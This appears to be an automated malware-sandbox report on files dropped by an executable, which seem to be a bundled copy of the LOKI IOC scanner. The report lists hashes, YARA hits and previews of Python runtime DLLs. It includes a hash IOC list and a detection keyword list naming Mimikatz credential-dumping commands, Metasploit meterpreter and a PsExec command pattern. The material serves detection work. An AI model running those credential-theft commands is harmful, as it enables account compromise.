Regin.\\usbclass\.sys;80.\\adpu160\.sys;80.\\msrdc64\.dat;80.\\msdcsvc\.dat;80.\\config\\Syst

C:\Users\user\Desktop\hash-iocs.txt Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	855930
Entropy (8bit):	5.458099249789609
Encrypted:	false
SSDEEP:	6144:2ekpoVVvb8NjyKsolE5qfEoWbBCjKIa/8aFxaLKDKCS+8ROz/HQ0ZwVtkPY39Qzo:Xk6HG2CLuDeoQFCcJ8veldwylU8uPjAJ
MD5:	76E89878C4F41E670998F71AFAE68794
SHA1:	634982643E7986C4DAB1C794B901CAACD953CD1B
SHA-256:	20E0D4605308113981AEF044F7835EE07A3D099E0AA486245913EBD4123503F4
SHA-512:	F356F5DC2E41D0C0984F818D5C23F309F12176232B23B6E9F1D86A9CEAF2D07CD6EBAF1DA647FC590B62587BA94AFAB2848462333BAEF42EBA091D3F120B3A12
Malicious:	false
Yara Hits:	Rule: EquationDrug_HDDSSD_Op, Description: EquationDrug - HDD/SSD firmware operation - nls_933w.dll, Source: C:\Users\user\Desktop\hash-iocs.txt, Author: Florian Roth @4nc4p
Preview:	#.# LOKI CUSTOM EVIL HASHES.# This file contains MD5, SHA1 and SHA256 hashes and a short info like file name.# or hash origin.#.# FORMAT -----------------------------------------------------------------------.#.# MD5;COMMENT.# SHA1;COMMENT.# SHA256;COMMENT.#.# EXAMPLES ---------------------------------------------------------------------.#.# 0c2674c3a97c53082187d930efb645c2;DEEP PANDA Sakula Malware - http://goo.gl/R3e6eG.# 000c907d39924de62b5891f8d0e03116;The Darkhotel APT http://goo.gl/DuS7WS.# c03318cb12b827c03d556c8747b1e323225df97bdc4258c2756b0d6a4fd52b47;Operation SMN Hashes http://goo.gl/bfmF8B - Zxshell..# 563d1512178cec1f6a73c98d565c98fa;Cygwin nc.exe example..4fef5e34143e646dbf9907c4374276f5;securelist.com https://goo.gl/nkbFwv.5bef35496fcbdbe841c82f4d1ab8b7c2;securelist.com https://goo.gl/nkbFwv.775a0631fb8229b2aa3d7621427085ad;securelist.com https://goo.gl/nkbFwv.7bf2b57f2a205768755c07f238fb32cc;securelist.com https://goo.gl/nkbFwv.7f7ccaa16fb15eb1c7399d422f8363e8;securelis

C:\Users\user\Desktop\keywords.txt Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	739
Entropy (8bit):	5.227572484598896
Encrypted:	false
SSDEEP:	12:3rSUOGmHM4XS+U48FyvZeG/VMLZ2RdnbmD0KARKzg9ZI6t9O9LaVk3JK0JKZscM0:7SQDkNgUvwaa0bM0KARKc2629r5KwKg0
MD5:	5E2BCBBEC755105C02FBB19152BE6F48
SHA1:	22B846AEEE64AC9A65DF252B5E9F68F313FDD00A
SHA-256:	E3D3B0D09250B10302A952344AF4FE31DABA257DAE261F02D50F65D51ED31CDB
SHA-512:	6366D794E379B127F2D294F01291B4FA84DC2B10EEA500E2AB303241AE10555990E30DAD40145EE124DD11B3ECA9E467E8DFF9B02D164D36C0DBFAC25B326C5D
Malicious:	false
Yara Hits:	Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: C:\Users\user\Desktop\keywords.txt, Author: Florian Roth
Preview:	# MALICIOUS KEYWORDS.#.# Subset of keywords from THOR APT Scanner..# Password Dumper.WCESERVICE.WCE_SERVICE.WCE SERVICE..# Mimikatz.eo.oe.kiwi.<3 eo.oe.mimilib.mimikatz.Mimikatz.privilege::debug.sekurlsa::LogonPasswords.sekurlsa::logonpasswords..# Metasploit.meterpreter.METERPRETER..# Metasploit PsExec.%COMSPEC% /C start %COMSPEC% /C \\WINDOWS\\Temp..# Malicious keywords.spoofing.keylogger.powersploit.passdumper.creddumper.credentialdumper.XScanPF..# Javascript Windows Scripting Host - Suspicious - see http://goo.gl/6HRCbk.wscript.exe /b /nologo /E:javascript..# Java Deserialisation Exploit Tools.yoserial-0...# Powersploit.Powersploit..# Powershell Mimikatz https://adsecurity.org/?p=2604.Invoke-Mimikatz..# Don't remove this line.

C:\Users\user\Desktop\lib\MSVCR90.dll Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	653952
Entropy (8bit):	6.885961951552677
Encrypted:	false
SSDEEP:	12288:5hr4UC+Ju/A0BI4yWkoGKJwZ9axKmhYTMAO7wFKjCUmRyyPe:9JfyZFGKJjxKmhSMAB6CUmRyyPe
MD5:	11D49148A302DE4104DED6A92B78B0ED
SHA1:	FD58A091B39ED52611ADE20A782EF58AC33012AF
SHA-256:	CEB0947D898BC2A55A50F092F5ED3F7BE64AC1CD4661022EEFD3EDD4029213B0
SHA-512:	FDC43B3EE38F7BEB2375C953A29DB8BCF66B73B78CCC04B147E26108F3B650C0A431B276853BB8E08167D34A8CC9C6B7918DAEF9EBC0A4833B1534C5AFAC75E4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................6.........!.R...7.....&.....0.....6.....3...Rich..........PE..L.....i[...........!.....\..........@-.......p....Rx.........................0......?T....@..............................\|..P...(................................3......................................@............................................text...t[.......\.................. ..`.data....g...p...D...`..............@....rsrc...............................@..@.reloc...7.......8..................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\_cffi_backend.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	6.601564686857406
Encrypted:	false
SSDEEP:	3072:4CBNYJ0ZkOiCl+VwTFPJoUCgd9gxOVessPhRbieiuy:zYJ3Op+2TF8gLgxONsPhRh
MD5:	891FB059049987C6CF148F4B93CDA09F
SHA1:	5A154EDE87B7A72556F46E63CB65B794BC200F52
SHA-256:	DD673ED74E624384C8C9541A799844C0BA95E81C1F67C51971433C7223B6C616
SHA-512:	FF4CC9F33B38BD6AF51141C93EE988BB139743E8D2E5BE956B971B20B350B7248DB9FDD3E83414A92EA5377D4ABD8B77F362D7889BF3DC31185D76B90AC19807
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.............[.~..v.X.x..v.I.}..v.^.v........v.N.l..v._.~..v.\.~..Rich...........PE..L...Y..\...........!.....,...........5.......@...............................0......................................p]..V....H..d...................................................................8G..@............@...............................text....*.......,.................. ..`.rdata.......@.......0..............@..@.data...0....`.......N..............@....reloc..>...........................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\_ctypes.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	92672
Entropy (8bit):	6.493969841565178
Encrypted:	false
SSDEEP:	1536:GSNT2se8WJAILpo+Wq0jKjLA4Yk9R/EcV4jnzWUthPIDu:pzWJAYppWn2A4f/PV4jniU7Yu
MD5:	7896F2B2B44A6DC7F8021C142339CE07
SHA1:	405319ED78E81800D54B1BFDA6198D7AF006220C
SHA-256:	DA6F2A24EE007F2BA49B120F6253E2030563093B6ABD4514BF81F7F2326AC96A
SHA-512:	7DC69FC771633F2E3864E5630FC3CD8CF01CB0ABE24085FBFFB4D91BE705D5A4BD9E65032AC120FCB13EEF489F825F3BF3FD5C447480FCEA39EE1DFBEAEB7D5C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................F......W......P......@.......W....Z......A......B....Rich...........PE..L.....\|\...........!.........~......\.....................................................@.........................P@......l+..x...................................................................@*..@...............x............................text............................... ..`.rdata...@.......B..................@..@.data...l"...P... ...2..............@....reloc...............R..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\_hashlib.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1096192
Entropy (8bit):	6.877596116149514
Encrypted:	false
SSDEEP:	24576:eIPXuC7npUm98O4vfcK+b7NF0oTZEGsN+KpP9e2hKgpSeKMzvZ1J:ztpU44vfLOEG4DZpSrOvZ1J
MD5:	AE0EF46BC3A52A92544B6FACAB0F32A1
SHA1:	4065DFD80C8725F08C9AD75303BC40702C14F6EC
SHA-256:	61372337FE96D67F92BCB44E6FAEEFB7FE404A326F819EA33E27D33DB98226F5
SHA-512:	98BBDD3AE5C473D1B145E8E50B438541430CE623809B2C2284E8E6E819B20967472B7DDB2541B4FFD178EA63C333003B97FA1C9FB96CD0073A2DD492905C4D73
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FX.Z.9...9...9...A...9...A...9...A...9...A...9...9...9...9...9...A...8...A...9...A...9..Rich.9..........PE..L.....\|\...........!.....Z...........^.......p............................................@.............................L....................................`..(...pr..............................p...@............p..P............................text...WY.......Z.................. ..`.rdata...]...p...^...^..............@..@.data...a........T..................@....reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\_multiprocessing.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	27648
Entropy (8bit):	6.280168209233203
Encrypted:	false
SSDEEP:	384:3EGWtVe6k5bBI8If+/iknYsiAzK0GSoY2Nfg0ttJ3Gbqsu1j9DG5XCM6nM:3Efe35bBJHA4Krhf5kU9ShCM
MD5:	D675D1F065D2A22EC122375BF8069C1B
SHA1:	499A53A5767313321CDB8E6D8C5220484841A3E2
SHA-256:	1B9E81143AADA184ECDA900B93CFFE4A4BBD6820CA4F6D7F32EB46A000B66099
SHA-512:	2460BB082F54E25327D51C91113C27EE260ACD526E51188A14BFEEC54769E7969979677561A69A68D2C7EFD242ECEC8C48BB830AB5FA718BB9CD53BDF2225D60
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I...........2.....1.....'..... .....z...7.....-.....6.....5...Rich..................PE..L.....\|\...........!.....:...0.......B.......P............................................@..........................i..\....^..d....................................R..............................`]..@............P...............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data........p.......X..............@....reloc...............b..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\_socket.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	6.535193648666847
Encrypted:	false
SSDEEP:	768:uRgfS9emPOtFVL+KHvjEG5RqFPBosNoC+M6Ll+cAuDaM:0jOtFVCKHzqFP+C7gLrfDa
MD5:	7B2AAEF4135DF0FD137DF1F152DE1708
SHA1:	B370B87DC4C39A4D8968EE998CE35DAAFC5359C2
SHA-256:	00B31446AD5F7038F253B64A60753D07FF082923C108752D565717947F1A38BA
SHA-512:	B2C4944E5F5D9A8B7CA9B86ACA049230737804F2F75E4B0EB83712D26B9FCBA031CA25FFFD10ADCB688902996443669D393B0C5DDFB1B88AE27CED464CEDC79C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......AV2..7\..7\..7\..O..7\..O..7\..O..7\..7]..7\..O..7\..O..7\..O..7\..O..7\.Rich.7\.........................PE..L...o.\|\...........!.....\...Z.......d.......p............................................@............................d...L...d...............................\|...`r..............................(...@............p..@............................text....[.......\.................. ..`.rdata..4 ...p..."...`..............@..@.data...x*.......(..................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\_ssl.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1415680
Entropy (8bit):	6.846106153505868
Encrypted:	false
SSDEEP:	24576:wDhK/yvb6r8IbUZQH8IKwjHWyZrLGW7Cp7no6gV+7GRI+KpPA6p4AR6pvAqJ4jzp:Zqv0og8I0w7KnIGZhspvAHjzQCJJ
MD5:	B64A8677AD7FDA3EF730FFC4533FD1F8
SHA1:	521FBDDBF5317C9EEE221F072FC5564CEEF1F8C6
SHA-256:	4EDD88905E478AAC34ADABC783A2F695644528F1D8E2426B1F4FA0BCFAB03682
SHA-512:	2EB6561D626E04EFD39155B861D4A5EB71161503B579634004EA163DDB2C81FE2FFA32452C8B9DACF28FC50AA2BCCD421575B28D121B05B2668F0257F98F6129
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................0......&......!..................6......,.:....7......4....Rich...................PE..L.....\|\...........!......................................................................@.............................D...........................................................................h...@............................................text...w........................... ..`.rdata..............................@..@.data........ ......................@....reloc..6...........................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\_tkinter.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	6.335002644682424
Encrypted:	false
SSDEEP:	768:/OWNT81C/gnCUUlUuaFVfmHZrGKcEICDyF3nNCeNXzEmSAEPY:/OWT81C/NtUu6VuZrGKcjCDyF3wIXzP6
MD5:	C61B4E27FC5FF25A9DFC2D10B79524D5
SHA1:	38D2BE95DDB389D7BC1F2D9E8C98D2C56D0660B7
SHA-256:	60CFE57C07C778C527C3B7522BEA9AAE7904868F440BD3F283AF831A0CBA4059
SHA-512:	047B1669D1ED54C3FE8EB03651DC592AF25458C3F424C24C2093F61F0E009DDCCADB9BAE0682E7184D23D5D06623256413577E80A1FE2B937EF7560367AE9F86
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........].Y.<...<...<...D}..<...Dk..<...Dl..<...D{..<...<...<...Da..<...Dz..<...Dy..<..Rich.<..................PE..L.....\|\...........!.....d...<.......m....................................................@.............................L...l...x...............................4...0...............................`...@............................................text....c.......d.................. ..`.rdata... ......."...h..............@..@.data...4...........................@....reloc..P...........................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\_win32sysloader.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.992693298555373
Encrypted:	false
SSDEEP:	192:t2VnGV7o5QUEZWm6Uk3fvf3X7THIL3YO+8I:tVU5QUEz6hfLTH98
MD5:	B4A567D80CCC08FB1C7FBB765847AFDA
SHA1:	B7FF2C68BA2887AAF5D029F41922E626C72B716D
SHA-256:	DBB0F9C499A710BBC8BCDE4ECC3577A6C9548262D6CE4434ED5A0708CBC787DD
SHA-512:	DDFEC25304BABE2DF55958F512F61AFD9AF88DDA499FE87931D17A9EEBF048449885A06A24BDDBC8604E11F07CED3C2ECE7F89C28290CAB5D1BF3816D22128DB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M.oC.............J.............................../........................Rich............PE..L......[...........!......................... ....;..........................`......................................P&..Z...\"..P....@..l....................P....... ..............................8!..@............ ...............................text...`........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...l....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\bz2.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	71168
Entropy (8bit):	6.739740223463112
Encrypted:	false
SSDEEP:	1536:Ixfp8+QhToyh3Y1rr24S1uBXTTva+X+E8S+fkPPYnLr:IZLuYlq4SuXTTva+X+XZfWC
MD5:	80558AB30129A2874B8776F4DD96AD7C
SHA1:	882E921AA68E196386397BE132B91CDEF23C5BF8
SHA-256:	CA19AF8B73E72DF5581CFF77085BB5885985C91ADA16B5A94DD50C827DD51093
SHA-512:	81ED07736ABC760D0ECC8EF9506B789F9DAD961A0969744FFF1120E3A294275C25FE9F215CCEFC7DD476017FEBAF117493141CCBB472E2FF4B24F32B44A0DA00
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.S.9.=K9.=K9.=K..K:.=K0..K:.=K0..K7.=K0..K;.=K0..K>.=K9.<KS.=K0..K1.=K0..K8.=K0..K8.=KRich9.=K................PE..L...(.\|\...........!.........P...............................................@............@.............................B...L...P............................0......................................H...@............................................text............................... ..`.rdata.."...........................@..@.data...P'.......$..................@....reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\cryptography.hazmat.bindings._constant_time.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7168
Entropy (8bit):	5.27929914348816
Encrypted:	false
SSDEEP:	96:KofhVv08JgMFMeiyiX6+LBDtM7C26V+ffx3XAypVAAD6GNfuO:KoJyAgMFMelu3lDimHVsJ3XvVlD6Wu
MD5:	1FCCC08819AC663D36E1C567E34E8451
SHA1:	9218D2A68454828E1FE5F06FAF3A14139BD3F494
SHA-256:	7318B66E5EA1348E6875B1E0217E450E22C3FB9C96739D746BE19C01BE69073D
SHA-512:	E744708102CC6BB57DD65E28FA29471C75784DBBB64B1D29FF06EF4AE1D1B84D62ABC3DA9BEC6645F079B4900EE95981755D3E2B9CDF1BB005C589877478A7C9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6X{.r9..r9..r9..{A..q9..{A..p9..{A..u9..r9..Z9..{A..}9..{A..s9..{A..s9..Richr9..................PE..L...go.\...........!................W........ ...............................P............@......................... &..X....!..P............................@..l................................... !..@............ ...............................text............................... ..`.rdata..x.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\cryptography.hazmat.bindings._openssl.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2258432
Entropy (8bit):	6.9649853247217965
Encrypted:	false
SSDEEP:	49152:aQ1T1qcIUId7CdI+F3EAiXgREMRCfFxwpd6DFI/YNKaA:2cILd+G+/iXg9gfFx66DF
MD5:	1F30B7CC98DFCFE314C570D1FE8A0B1A
SHA1:	9AD798C634679150FF14995C1DEEB658CC9ABF53
SHA-256:	0B602CCA491F17F3D55CC1B760BB1EBE48D96E4CA68CB6769C46960ADD08B67C
SHA-512:	F6CD07C59DF110C95FF699DBC3EF0C1AD14A7EDFA64B5534228BC0587898CF7866D9EBBA0C5DC2759E187F90B50CDFA706F633A2E32F1D460C652CB7A84A560D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........).).H@z.H@z.H@z.0.z.H@z.0.z.H@z.0.z.H@z.HAz.H@z.H@z.H@z.>.z.J@z.0.z.H@z.0.z.H@z.0.z.H@zRich.H@z........................PE..L...go.\...........!.....<...V.......A.......P................................"...........@.........................`...L....................................@!..Y......................................@............P...............................text....;.......<.................. ..`.rdata.......P.......@..............@..@.data....[.......<..................@....reloc...u...@!..v....!.............@..B........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\cryptography.hazmat.bindings._padding.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7680
Entropy (8bit):	5.494741496784773
Encrypted:	false
SSDEEP:	192:Kov1wlvo+uJbeG3HuuxstxsNJ3XvVlD6:Kov1wNo+FGXFx0xU1fVl
MD5:	7DB9C7461C4F2F5883F86AF789F81413
SHA1:	E71B8A9266A82C28219AE2AB6EB2144AD1731FB6
SHA-256:	11E625062ADD39E8EA1386FD28965CD4F2E52FCB6825F7BD1607DB576A09F7CA
SHA-512:	0421952AD1365486147E9232FB966B62D2551D098568579BD103A9DF4A7C0A04AD2C889E6C7E9D6318A7A7215A08AF89449EA645373F07EC9041865F82D49BA4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6X{.r9..r9..r9..{A..q9..{A..p9..{A..u9..r9..Z9..{A..}9..{A..s9..{A..s9..Richr9..................PE..L...go.\...........!................G........ ...............................P............@.........................0&..L....!..P............................@......................................0!..@............ ...............................text............................... ..`.rdata..\|.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\library.zip Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2623728
Entropy (8bit):	7.989708508062485
Encrypted:	false
SSDEEP:	49152:B4Ch0hPVz6WXcdOL3CfQqyotIAjEuZ/AQFOU8cpLYIxIu0sGW+dAb7RFec:Bvols1IAjEy/AQFOwpjMW+dAb7Cc
MD5:	DF9A3BAEB7B688DE8037FF9CE7E8F7CC
SHA1:	571132E00F20EB888161AC37654CFE4A9FE9D4F0
SHA-256:	2D8CA76D3A03E68AC4313D45B78C73BD9BFF5BFBA25E19687F439E8BED0B0883
SHA-512:	1EE9D558C56E8BACBDF7CF37044F1CFD1EBEFBE41375069EDE0BB1025A966834F72B505CD855E8C7FAE8A7CD7C80FCAE235784019D4EF9AB0DA1357B58F1321C
Malicious:	false
Preview:	PK........(.%O.x.....W.......BUILD_CONSTANTS.pycc...e+R......@..$.......(F....(&..F.(f..&.(...f.(V.l..+PY1..HO..M...M.K./f.......K.....%..I.E...:.F.....fV..V......4..J@.......N..>......A...!%\p1......87....1.5>8$....Io...kp..o@...z.. gW...(..D....~@.~!.z..%.@a.....T;P......!..PK.........<NJ.Z.^Y....9......BaseHTTPServer.pyc.;Yp..uof....@..@H.8.D.T.......$..)J.4.M...5....`vf93Kp....r9UI%.-[.-.v.;.8q.;...U.JU\..O..s})..]..K\2..w.y..>.....{.}.b...a.}..... ..0.@..a..9.y..l.r..r....<.. ..V.....R.,Y.k.?5.%.V.!.A.@.."..\....S..2\....u..,.....Q.%X..Q.W..-.....q.#z#..yai......1.ul.....al.W... w...U...An.q.L..f&.....<..1.fq.....8...G.DR.+/wd.>."...>.;3c.t.&u?He....6.n.yi.Y....7.(...Xy..d.EA.4..Y.2tb..H.....7.'.,.N.4.O..q.c...D..S...sz.r$..5..a$6...us-...;C.>Q...2I..\|.[[../.\7A^m.^.~.>af'...=~.S...I.h"..s...P.~..G..3.......fs..@..Hl..0S..gR..`2D..j....$O. U.'U.....jJ.c...j.nB.>..${..'....(\|.W.?x)./..+!.......^.D...h6...L..#...)L$...k..r..w....5C....B..b..M..f.Ed.

C:\Users\user\Desktop\lib\mfc90.dll Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1156600
Entropy (8bit):	6.52546095742681
Encrypted:	false
SSDEEP:	24576:HMh/PZa3TrShmbjRbf/zxUK4BpifCqY5TcB2sQL+XmDOl:HMh/PZa3HTjtFUKwhqY5TcyL+XmE
MD5:	462DDCC5EB88F34AED991416F8E354B2
SHA1:	6F4DBB36A8E7E594E12A2A9ED4B71AF0FAA762C1
SHA-256:	287BD98054C5D2C4126298EE50A2633EDC745BC76A1CE04E980F3ECC577CE943
SHA-512:	35D21E545CE6436F5E70851E0665193BB1C696F61161145C92025A090D09E08F28272CBF1E271FF62FF31862544025290E22B15A7ACDE1AEA655560300EFE1EC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C.R."..."..."......"......."......"...p^.."..\m[.."...pX.."...pN.."...pI.."......"..."...!...pG.>"...p_.."...pY.."...p\.."..Rich."..................PE..L....`1G...........!.....T...N......C+.......p....^x................................g.....@..............................f......x.......x................#.......... ..................................@...............@...........................text....R.......T.................. ..`.data....j...p...H...X..............@....rsrc...x...........................@..@.reloc...1.......2...P..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\pyexpat.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	143360
Entropy (8bit):	6.61873865412512
Encrypted:	false
SSDEEP:	3072:Jtm+8Lr63In5y7+/Lt2NVFU/6NJ6VMqU:JtXxY5ybbUiNQVMq
MD5:	E7D033F40F44D497D6DDC5CC020CA40B
SHA1:	9CE1CAC6607C5E1DE58AD30B75BDB5B902BB24F1
SHA-256:	3285C94AE4C801147F564E92F1DD8DC00D630E041F80B33DD37300CE597004A6
SHA-512:	7BC1CE6C6F3B4B4A0D75A91EC15BF1C790EDFF2389DBC35EEC49A0F058B7FD2BFCCEB4AA088482C88B2DE0591996647C2D682B007B64524A549A6C9A2528FB08
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{..M...M...M...Dby.O...Dbo.C...Dbh.O...Db..J...M...$...Dbe.H...Db~.L...Db}.L...RichM...................PE..L.....\|\...........!.........r...............................................`............@.............................J.......P............................@..........................................@............................................text............................... ..`.rdata...B.......D..................@..@.data...x.... ......................@....reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\python27.dll Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2649600
Entropy (8bit):	6.722420193769921
Encrypted:	false
SSDEEP:	49152:Mq1WL6TfbVYU9U/EaP/iv4CMbxndsBbWA8LEkt34PMnhMmQHNZlhId1Tfcd+yW3d:1WL6UPI4CMbxdeZAhXhMnHXledIpm
MD5:	2FEB5AD28FAE3DE286803C6CCC6491C0
SHA1:	C1A2CEEAF37778BBE0A187E8B6CC12E488224028
SHA-256:	E2460663CB2E97DD61AFB42E0310C026B8417D6C2C135F54D2DA90696BEA6FA4
SHA-512:	37D2FB967742A1207DFE763C276B7A1AE515F50A4D9D01A83951FF69D87FD33ED1CDBAB978AE8D3D7499CE7D0C3E756DC53711EA66E7B6E06758BCC511664B25
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Bu....{...{...{..[...{..l...{..l....{..l....{..l...{...z.<.{..l..{..l...{..l...{..l...{.Rich..{.................PE..L.....\|\...........!.........................................................).....V.(...@..........................g!..\|...P!.x....@(......................P(.P\.. ................................O!.@............................................text...z........................... ..`.rdata...D.......F..................@..@.data...0C....!..(....!.............@....rsrc........@(.......&.............@..@.reloc...f...P(..h....'.............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\pythoncom27.dll Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	397824
Entropy (8bit):	6.646881960817534
Encrypted:	false
SSDEEP:	6144:Q2yUi0rjBcPEFlmKP/eHHn0T6euClw965SOKLbpd675XL0Kk:jyUi0rjByE/mKP/e0cCmpdYQ
MD5:	01C89FB05232C8310F6A8B4975297963
SHA1:	E03D1C9DF87E0E6F98F16AAE5EBD9FA51D696E35
SHA-256:	DBEC592DA6DD2A4D653DEF499E22865246F1F6441172FADF1A15DB498F11781A
SHA-512:	C5DF838814F4747F3BA192E39265FADF83295762D3A1F5CF37FCAD22C88B0157297A5BD3B5667C394D534F22CA1B680780FF1BE12C443D2265DFC674CCDC4B42
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A. .. .. ...o.. ..r.. ..r.. ..w.D. ..r.. ..w.A. .. ...!..r... ..r.. ..r.. ..Rich. ..........................PE..L.....[...........!.................h............ .................................................................p...>^........... ..\....................0..dq..................................p...@...............\............................text....~.......................... ..`.rdata..............................@..@.data........p...:...`..............@....rsrc...\.... ......................@..@.reloc..xr...0...t..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\pywintypes27.dll Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	110592
Entropy (8bit):	6.569529056002426
Encrypted:	false
SSDEEP:	3072:q5z1B1kNtTUo+cJt9du4EnVn++M4Psj0I4Y7bi0Of4fuFsNOK1uMN/c:qN1BCtTUoPJt9du4EnVdaN4Y7bi0a4fb
MD5:	1EC8D89E992D8F04CB0042E2122CA95C
SHA1:	E26C4B2E038D85CC979B1278E918619F95AD3613
SHA-256:	25B66CEFD9A6C8B401C10451668516ADC5F11EAB9246A19780F59554F12F43C5
SHA-512:	8A52FC4AA73BA2B7E05A8404A9A7C8892829074540374D5C5C6AEE3776AB1D2D52CAB92FD8FE7572D68D3ACD3899EA4FD2504E60F412BBB85A6FCEA915DA1821
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qz.Y5...5...5....Tz.7...+Iy.6...+Io.8.....".4...+I..1.....'.>...5.......+Ih.$...+I~.4...+I}.4...Rich5...................PE..L...:..[...........!................F.............z..................................................................D..PJ..T/..........d............................................................*..@............................................text...2........................... ..`.rdata.............................@..@.data... ............~..............@....rsrc...d...........................@..@.reloc..d...........................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\select.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	5.840237019743671
Encrypted:	false
SSDEEP:	192:qkjXJRZobEm7QNw7MPDdqPSU+n6ErXUnv3XDVR6yAXc1U5O:quXJnjCAPDdFB6GXoPzV5yu1
MD5:	18EAD4BF3A21899F4C94DB60BA39DA41
SHA1:	EE856211F3CD00F29C1287C2DC129503FF78667B
SHA-256:	FB739F595B0C51F0BEDE73709FEB997BBCD15E7C5BEDF4A1B1D97856BE602C40
